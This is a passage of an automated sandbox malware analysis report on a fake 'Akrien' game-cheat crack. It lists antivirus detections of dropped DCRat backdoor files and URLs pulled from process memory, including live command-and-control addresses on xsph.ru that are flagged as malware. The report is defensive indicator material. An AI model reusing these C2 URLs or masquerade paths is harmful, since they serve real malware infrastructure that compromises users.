            | C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exe | 100% | Avira | TR/ATRAPS.Gen2 | |
            | C:\Browserfont\services.exe | 100% | Avira | HEUR/AGEN.1323984 | |
            | C:\Browserfont\Registry.exe | 100% | Avira | HEUR/AGEN.1323984 | |
            | C:\AkrienAntiLeak\SgrmBroker.exe | 100% | Avira | HEUR/AGEN.1323984 | |
            | C:\Users\Public\Videos\cmd.exe | 100% | Avira | HEUR/AGEN.1323984 | |
            | C:\Browserfont\refdhcp.exe | 100% | Avira | HEUR/AGEN.1323984 | |
            | C:\Users\user\AppData\Local\Temp\AkrienCrack.exe | 100% | Joe Sandbox ML | | |
            | C:\Browserfont\RDMwYUvZPK.exe | 100% | Joe Sandbox ML | | |
            | C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exe | 100% | Joe Sandbox ML | | |
            | C:\Browserfont\services.exe | 100% | Joe Sandbox ML | | |
            | C:\Browserfont\Registry.exe | 100% | Joe Sandbox ML | | |
            | C:\AkrienAntiLeak\SgrmBroker.exe | 100% | Joe Sandbox ML | | |
            | C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exe | 100% | Joe Sandbox ML | | |
            | C:\Users\Public\Videos\cmd.exe | 100% | Joe Sandbox ML | | |
            | C:\Browserfont\refdhcp.exe | 100% | Joe Sandbox ML | | |
            | C:\AkrienAntiLeak\SgrmBroker.exe | 88% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat | |
            | C:\Browserfont\RDMwYUvZPK.exe | 88% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat | |
            | C:\Browserfont\Registry.exe | 88% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat | |
            | C:\Browserfont\refdhcp.exe | 88% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat | |
            | C:\Browserfont\services.exe | 88% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat | |
            | C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe | 88% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat | |
            | C:\Program Files (x86)\Windows Photo Viewer\en-GB\RDMwYUvZPK.exe | 88% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat | |
            | C:\ProgramData\RDMwYUvZPK.exe | 88% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat | |
            | C:\Recovery\RDMwYUvZPK.exe | 88% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat | |
            | C:\Users\Default\Saved Games\RDMwYUvZPK.exe | 88% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat | |
            | C:\Users\Public\Videos\cmd.exe | 88% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat | |
            | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\RobloxPlayerLauncher[1].exe | 0% | ReversingLabs | | |
            | C:\Users\user\AppData\Local\Temp\AkrienCrack.exe | 75% | ReversingLabs | ByteCode-MSIL.Trojan.Uztuby | |
            | C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exe | 53% | ReversingLabs | Win64.PUA.Packunwan | |
            | C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exe | 100% | ReversingLabs | Win32.Trojan.Generic | |
            | C:\Users\user\AppData\Local\Temp\RBX-338F2523\RobloxPlayerLauncher.exe | 0% | ReversingLabs | | |
            | C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exe | 0% | ReversingLabs | | |
            | C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\RDMwYUvZPK.exe | 88% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat | |
            | C:\Users\user\RDMwYUvZPK.exe | 88% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat | |
            | C:\Windows\BitLockerDiscoveryVolumeContents\RDMwYUvZPK.exe | 88% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat | |
            | C:\Windows\en-US\RuntimeBroker.exe | 88% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat | |
            No Antivirus matches
            No Antivirus matches
            No contacted domains info
            | Name | Malicious | Antivirus Detection | Reputation |
            |---|---|---|---|
            | http://a0985805.xsph.ru/@=MGZkZzNmlTN | true | 4%, Virustotal, Browse; Avira URL Cloud: malware | unknown |
            unknown
            https://uploads.backtrace.rbx.com/postCrashUploadToBacktraceBaseUrla2440b0bfdada85f34d79b43839f2b49eRFAwChXSve.exe, 00000000.00000003.1729652260.00000000036AC000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000000.1732831327.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1989890694.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000000.1748405110.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe.1.drfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://tools.medialab.sciences-po.fr/iwanthue/index.phpRFAwChXSve.exe, 00000000.00000003.1729652260.00000000036AC000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000000.1732831327.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1989890694.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000000.1748405110.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe.1.drfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapper/bucket/zflagRobloxPlayerLauncher.exe, 00000003.00000002.1998489973.00000000015F4000.00000004.00000020.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://www.ascendercorp.com/http://www.ascendercorp.com/typedesigners.htmlLicensedAkrienPremiumCrack.exe, 00000004.00000002.4191571770.0000000140129000.00000002.00000001.01000000.00000009.sdmpfalse
            • URL Reputation: safe
            unknown
            https://127.0.0.1WindowsBootstrapperRecoveryInstallerUrlWindowsBootstrapperAlternativeAdminKeyDeployRFAwChXSve.exe, 00000000.00000003.1729652260.00000000036AC000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000000.1732831327.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1989890694.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000000.1748405110.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe.1.drfalse
            • Avira URL Cloud: safe
            unknown
            https://uploads.backtrace.rbx.com/postRobloxPlayerLauncher.exe, 00000003.00000003.1995049871.00000000015A8000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe.1.drfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://ephemeralcounters.api.roblox.com/RobloxPlayerLauncher.exe, 00000001.00000003.1988432478.00000000015A9000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000003.1987825890.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1992465027.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1991537782.00000000015A9000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000003.1988432478.00000000015C4000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1991537782.00000000015C4000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000003.1988611713.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000003.1994811368.00000000015F4000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.2005374246.00000000040B0000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.2005445454.00000000040C1000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000003.1994735562.0000000001621000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1998556322.0000000001622000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000003.1994692062.00000000040BF000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000003.1994866454.00000000040C1000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1998489973.00000000015F4000.00000004.00000020.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://akrien.wtf/akrienmc/api/v2/brain.php?a=UD25iC2Q8B4thsh77058AkrienPremiumCrack.exe, 00000004.00000002.4189782115.00000000032BC000.00000004.00000020.00020000.00000000.sdmp, AkrienPremiumCrack.exe, 00000004.00000002.4189782115.00000000032A5000.00000004.00000020.00020000.00000000.sdmp, AkrienPremiumCrack.exe, 00000004.00000002.4188930888.0000000000492000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://setup.rbxcdn.com/ersion-d6abc3b106a04c5c-rbxInstallerPkgManifest.txtRobloxPlayerLauncher.exe, 00000001.00000003.1987825890.00000000042A6000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1992465027.00000000042A6000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://client-telemetry.roblox.com/RobloxPlayerLauncher.exe, 00000001.00000003.1988432478.00000000015C4000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1991537782.00000000015C4000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1992167381.00000000041F0000.00000004.00000020.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://crl.microsoftBURobloxPlayerLauncher.exe, 00000003.00000002.2005445454.00000000040C1000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000003.1994692062.00000000040BF000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000003.1994866454.00000000040C1000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://a0985805.xsph.ru/59f76ddc.php?k1z6lifha3Idda=zJqsGbE9fMU9rrosWdn6UVtijiQ1Xya&Tl=2I0f9g1TuQiyzRDMwYUvZPK.exe, 00000028.00000002.4191108963.0000000002BF1000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: malware
            unknown
            https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapperJRobloxPlayerLauncher.exe, 00000001.00000002.1991396263.000000000150B000.00000004.00000020.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://ephemeralcounters.api.roblox.com/dRobloxPlayerLauncher.exe, 00000001.00000003.1988432478.00000000015A9000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1991537782.00000000015A9000.00000004.00000020.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://ephemeralcounters.api.roblox.com/x_ageRobloxPlayerLauncher.exe, 00000001.00000003.1987825890.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1992465027.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000003.1988611713.00000000042BA000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namerefdhcp.exe, 00000009.00000002.1917392588.0000000002D7E000.00000004.00000800.00020000.00000000.sdmp, RDMwYUvZPK.exe, 00000028.00000002.4191108963.0000000002BF1000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://ephemeralcounters.api.roblox.com/d$6RobloxPlayerLauncher.exe, 00000003.00000003.1994735562.0000000001621000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1998556322.0000000001622000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://ww(w.dRFAwChXSve.exe, 00000000.00000003.1727884209.0000000003329000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://a0985805.xsph.ru/RDMwYUvZPK.exe, 00000028.00000002.4191108963.0000000002BF1000.00000004.00000800.00020000.00000000.sdmptrue
            • 7%, Virustotal, Browse
            • Avira URL Cloud: malware
            unknown
            http://www.apache.org/licenses/LICENSE-2.0AkrienPremiumCrack.exe, 00000004.00000002.4191571770.0000000140129000.00000002.00000001.01000000.00000009.sdmpfalse
            • URL Reputation: safe
            unknown
            https://clientsettingscdn.roblox.com/)RobloxPlayerLauncher.exe, 00000001.00000003.1988432478.00000000015A9000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1991537782.00000000015A9000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://127.0.0.1tleThresholdRobloxPlayerLauncher.exe, 00000001.00000002.1991396263.0000000001539000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000003.1988782815.0000000001538000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000003.1988573436.0000000001533000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000003.1995103781.00000000015B0000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1998396045.00000000015B1000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000003.1995049871.00000000015A8000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://crashpad.chromium.org/RFAwChXSve.exe, 00000000.00000003.1729652260.00000000036AC000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000000.1732831327.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1989890694.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000000.1748405110.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe.1.drfalse
            • URL Reputation: safe
            unknown
            https://ephemeralcounters.api.roblox.com/3RobloxPlayerLauncher.exe, 00000003.00000002.2005374246.00000000040B0000.00000004.00000020.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://curl.se/docs/http-cookies.htmlRFAwChXSve.exe, 00000000.00000003.1729652260.00000000036AC000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000000.1732831327.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1989890694.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000000.1748405110.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe.1.drfalse
            • Avira URL Cloud: safe
            unknown
            https://ecsv2.roblox.com/client/pbeMs2%lRobloxPlayerLauncher.exe, 00000003.00000003.1995103781.00000000015B0000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1998396045.00000000015B1000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000003.1995049871.00000000015A8000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://setup.rbxcdn.com/version-d6abc3b106a04c5c-rbxInstallerPkgManifest.txtLRobloxPlayerLauncher.exe, 00000001.00000003.1987825890.000000000424D000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1992167381.0000000004254000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://setup.rbxcdn.com/RobloxPlayerLauncher.exe, 00000001.00000002.1991537782.00000000015C4000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1992465027.00000000042A6000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://www.roblox.comURLInfoAboutFailedRFAwChXSve.exe, 00000000.00000003.1729652260.00000000036AC000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000000.1732831327.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1989890694.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000000.1748405110.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe.1.drfalse
            • Avira URL Cloud: safe
            unknown
            https://ecsv2.roblox.com/client/pbeTelemetryV2UrlFFlagRolloutDuplicateRobloxTelemetryCountersEnabledRFAwChXSve.exe, 00000000.00000003.1729652260.00000000036AC000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000000.1732831327.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1989890694.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000000.1748405110.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe.1.drfalse
            • Avira URL Cloud: safe
            unknown
            https://setup.rbxcdn.com/version-d6abc3b106a04c5c-rbxInstallerPkgManifest.txtWRobloxPlayerLauncher.exe, 00000001.00000003.1988432478.00000000015C4000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1991537782.00000000015C4000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://curl.se/docs/alt-svc.htmlRFAwChXSve.exe, 00000000.00000003.1729652260.00000000036AC000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000000.1732831327.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1989890694.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000000.1748405110.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe.1.drfalse
            • Avira URL Cloud: safe
            unknown
            https://ecsv2.roblox.com/client/pbeMs2?RobloxPlayerLauncher.exe, 00000001.00000002.1991396263.0000000001539000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000003.1988782815.0000000001538000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000003.1988573436.0000000001533000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://setup.rbxcdn.com/version-d6abc3b106a04c5c-rbxInstallerPkgManifest.txtZRobloxPlayerLauncher.exe, 00000001.00000003.1988432478.00000000015C4000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1991537782.00000000015C4000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://setup.rbxcdn.com/version-d6abc3b106a04c5c-rbxBootstrapperPkgManifest.txtRobloxPlayerLauncher.exe, 00000001.00000003.1988432478.00000000015A9000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1991537782.00000000015A9000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://clientsettingscdn.roblox.com/v2/client-version/WindowsPlayerrRobloxPlayerLauncher.exe, 00000001.00000002.1992167381.0000000004210000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://setup.rbxcdn.com/version-d6abc3b106a04c5c-rbxBootstrapperPkgManifest.txt6RobloxPlayerLauncher.exe, 00000001.00000003.1988432478.00000000015C4000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1991537782.00000000015C4000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://127.0.0.1RFAwChXSve.exe, 00000000.00000003.1729652260.00000000036AC000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1991396263.0000000001539000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000003.1988782815.0000000001538000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000000.1732831327.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1989890694.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1991396263.000000000150B000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000003.1988573436.0000000001533000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000003.1995103781.00000000015B0000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1998224998.000000000157B000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000000.1748405110.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1998396045.00000000015B1000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000003.1995049871.00000000015A8000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe.1.drfalse
            • Avira URL Cloud: safe
            unknown
            https://clientsettingscdn.roblox.com/RobloxPlayerLauncher.exe, 00000003.00000003.1994735562.0000000001621000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1998556322.0000000001622000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://uploads.backtrace.rbx.com/postTRobloxPlayerLauncher.exe, 00000003.00000003.1994735562.0000000001621000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1998556322.0000000001622000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapper/bucket/zflagwRobloxPlayerLauncher.exe, 00000003.00000002.2005445454.00000000040C1000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000003.1994692062.00000000040BF000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000003.1994866454.00000000040C1000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://ephemeralcounters.api.roblox.com/v1.1/Counters/BatchIncrement?apiKey=76E5A40C-3AE1-4028-9F10RobloxPlayerLauncher.exe, 00000003.00000002.1998556322.0000000001622000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000003.1994692062.00000000040BF000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000003.1994866454.00000000040C1000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://bit.ly/1eMQ42URFAwChXSve.exe, 00000000.00000003.1729652260.00000000036AC000.00000004.00000020.00020000.00000000.sdmp, RFAwChXSve.exe, 00000000.00000003.1727884209.0000000003329000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000000.1732831327.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1989890694.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000000.1748405110.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe.1.drfalse
            • Avira URL Cloud: safe
            unknown
            http://www.winimage.com/zLibDllRFAwChXSve.exe, 00000000.00000003.1729652260.00000000036AC000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000000.1732831327.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1989890694.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000000.1748405110.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe.1.drfalse
            • URL Reputation: safe
            unknown
            https://ephemeralcounters.api.roblox.com/v1.0/SequenceStatistics/BatchAddToSequencesV2?apiKey=76E5A4RobloxPlayerLauncher.exe, 00000001.00000002.1992167381.0000000004276000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://www.winimage.com/zLibDll-1.2.11rbrRFAwChXSve.exe, 00000000.00000003.1729652260.00000000036AC000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000000.1732831327.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1989890694.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000000.1748405110.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe.1.drfalse
            • Avira URL Cloud: safe
            unknown
            https://ecsv2.roblox.com/client/pbeRFAwChXSve.exe, 00000000.00000003.1729652260.00000000036AC000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1991396263.0000000001539000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000003.1988782815.0000000001538000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000000.1732831327.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1989890694.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1991396263.000000000150B000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000003.1988573436.0000000001533000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000003.1995103781.00000000015B0000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1998224998.000000000157B000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000000.1748405110.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1998396045.00000000015B1000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000003.1995049871.00000000015A8000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe.1.drfalse
            • Avira URL Cloud: safe
            unknown
            https://ephemeralcounters.api.roblox.com/(RobloxPlayerLauncher.exe, 00000001.00000003.1988432478.00000000015A9000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1991537782.00000000015A9000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://akrien.wtf/&AkrienPremiumCrack.exe, 00000004.00000002.4189782115.0000000003292000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            • No. of IPs < 25%
